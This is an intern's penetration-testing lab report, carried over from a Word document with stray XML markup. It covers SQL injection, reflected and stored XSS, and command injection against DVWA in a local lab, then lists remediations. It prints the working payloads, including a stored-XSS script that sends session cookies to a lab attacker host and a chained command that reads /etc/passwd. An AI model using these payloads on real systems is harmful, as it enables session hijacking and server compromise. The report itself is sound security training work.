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Report: Web Application Security &amp; Exploitation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Intern Name:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Moosa Adnan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Intern ID:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> APSPL2628099</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Program:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cybersecurity &amp; Ethical Hacking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Internship Period:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> February 11, 2026 – April 11,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Organization:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ApexPlanet Software Pvt. Ltd.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Task 4 was to identify and exploit common web application vulnerabilities (OWASP Top 10) hosted on the target system. The primary target was the Damn Vulnerable Web App (DVWA) running on Metasploitable2 (Port 80). This task demonstrates the risks of insecure coding practices such as improper input validation and poor session management. All testing was strictly confined to the authorized local lab environment.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Methodology &amp; Tools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was conducted using manual exploitation techniques alongside industry-standard web proxy tools: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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> DVWA (Damn Vulnerable Web Application) hosted at http://192.168.56.101/dvwa/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Burp Suite:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used as a local intercepting proxy to capture, modify, and analyze HTTP/HTTPS requests between the browser and the target server.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Mozilla Firefox:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configured with a proxy extension (FoxyProxy) to route traffic through Burp Suite.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Payloads:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Standard web exploitation payloads for SQLi, XSS, and Command Injection.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Phase 1: SQL Injection (SQLi)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 Injection occurs when untrusted user input is directly concatenated into a database query, allowing an attacker to manipulate the backend database.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Exploitation Steps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Navigated to the "SQL Injection" module in DVWA.</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 the User ID input field, entered the standard authentication bypass payload: ' OR 1=1 #</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Submitted the request. The ' closed the original query, OR 1=1 forced the condition to be true, and # commented out the rest of the backend query.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Result &amp; Impact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Success:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application dumped the first names and surnames of all registered users in the database, including the administrator.</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High. An attacker could use this vulnerability to bypass authentication, extract sensitive user data (hashes, PII), or drop database tables.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Phase 2: Cross-Site Scripting (XSS)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XSS vulnerabilities allow an attacker to inject malicious client-side scripts into web pages viewed by other users.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Reflected XSS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Navigated to the "XSS (Reflected)" module.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 the "What's your name?" input field, injected the following JavaScript payload: &lt;script&gt;alert('XSS Executed by Moosa')&lt;/script&gt;</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The browser immediately executed the script, popping up an alert box with the injected message.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Stored XSS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Navigated to the "XSS (Stored)" module (e.g., a Guestbook or Comment section).</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Entered the payload &lt;script&gt;document.location='http://192.168.56.102/cookie_stealer.php?cookie='+document.cookie&lt;/script&gt; into the message field.</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Result:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The payload was permanently saved to the database. Anyone viewing that page subsequently would have their session cookies unknowingly sent to the attacker machine.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High. XSS can lead to session hijacking, defacement, and phishing attacks.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Phase 3: Command Injection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 Injection allows an attacker to execute arbitrary operating system commands on the host server via a vulnerable web application.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Exploitation Steps</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Navigated to the "Command Injection" module, which features a tool to ping an IP address.</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Instead of a standard IP, entered the following chained payload: 127.0.0.1 ; whoami &amp;&amp; cat /etc/passwd</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Submitted the request. The semicolon (;) terminated the ping command and instructed the Linux shell to execute the subsequent commands.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Result &amp; Impact</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Success:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The web page returned the ping results, followed immediately by the output of whoami (showing www-data) and the entire contents of the /etc/passwd file.</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Critical. This allows an attacker to interact directly with the underlying operating system, potentially escalating privileges and gaining a permanent reverse shell.</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 &amp; Remediation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web application assessment revealed critical flaws in how user input is handled. The target application completely lacks input sanitization and output encoding.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Remediations:</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Prevent SQLi:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement Prepared Statements (Parameterized Queries) instead of concatenating strings to build SQL queries.</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Prevent XSS:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforce strict Output Encoding (converting special characters to HTML entities like &lt; and &gt;) before rendering user-supplied data in the browser.</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Prevent Command Injection:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Avoid making direct OS calls with user input. If necessary, use strict whitelisting to only allow specific, safe input formats (e.g., validating that an input is strictly an IP address format before pinging).</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Declaration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Moosa Adnan, certify that this web application vulnerability assessment was performed ethically within the designated lab environment provided for my internship at ApexPlanet. All actions adhere to the rules of engagement and confidentiality guidelines outlined in my offer letter.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